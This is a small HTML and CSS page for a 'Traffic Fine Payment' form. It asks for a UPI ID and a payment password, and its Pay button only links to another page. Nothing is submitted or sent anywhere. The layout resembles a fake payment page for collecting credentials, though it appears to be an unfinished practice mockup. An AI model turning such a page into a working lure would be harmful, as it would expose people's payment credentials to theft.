<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Image Submission</title>
<style>

  body {
    margin: 0;
    padding: 0;
    font-family: Arial, sans-serif;
    background-color: #222;
    color: #fff;
  }

  h1 {
    font-size: 50px;
    color: antiquewhite;
    margin-bottom: 50px;
  }

  .container {
    display: flex;
    justify-content: center;
    align-items: center;
    height: 100vh;
  }

  .content {
    text-align: center;
  }

  .wrap {
    width: 420px;
    background-color: transparent;
  }

  .input {
    margin-bottom: 30px;
  }

  .input input {
    width: 100%;
    height: 50px;
    background: transparent;
    border: none;
    outline: none;
    border: 2px solid rgba(255, 255, 255, 0.2);
    border-radius: 40px;
    color: #fff;
    font-size: 23px;
    padding: 0 20px;
  }

  .input input::placeholder {
    color: aliceblue;
    font-weight: bold;
    font-size: 20px;
  }

  .btn {
    width: 100%;
    height: 45px;
    background-color: #fff;
    border: none;
    outline: none;
    border-radius: 40px;
    box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
    cursor: pointer;
    font-size: 20px;
    font-weight: bold;
    color: #333;
    font-weight: 600;
  }

  label {
    color: aquamarine;
    font-size: 20px;
    font-family: 'Gill Sans', 'Gill Sans MT', Calibri, 'Trebuchet MS', sans-serif;
    font-weight: bold;  
  }

  .background-clip {
    position: fixed;
    top: 0;
    left: 0;
    min-width: 100%;
    min-height: 100%;
    width: auto;
    height: auto;
    z-index: -1;
  }

</style>
</head>
<body>

<div class="container">
  <div class="content">
    <h1>Traffic Fine Payment</h1>
    <div class="wrap">
      <form action="">
        <div class="input">
          <label>UPI ID</label>
          <input type="text" placeholder="Number Plate Number" required>
        </div>
        <div class="input">
          <label>Password</label>
          <input type="password" placeholder="Password" id="password" required>
        </div>
      </form>
    </div>
    <a href="final.html"><button type="submit" class="btn">Pay</button></a>
  </div>
</div>

<video autoplay muted loop class="background-clip">
  <source src="bg.mp4" type="video/mp4">
</video>

</body>
</html>
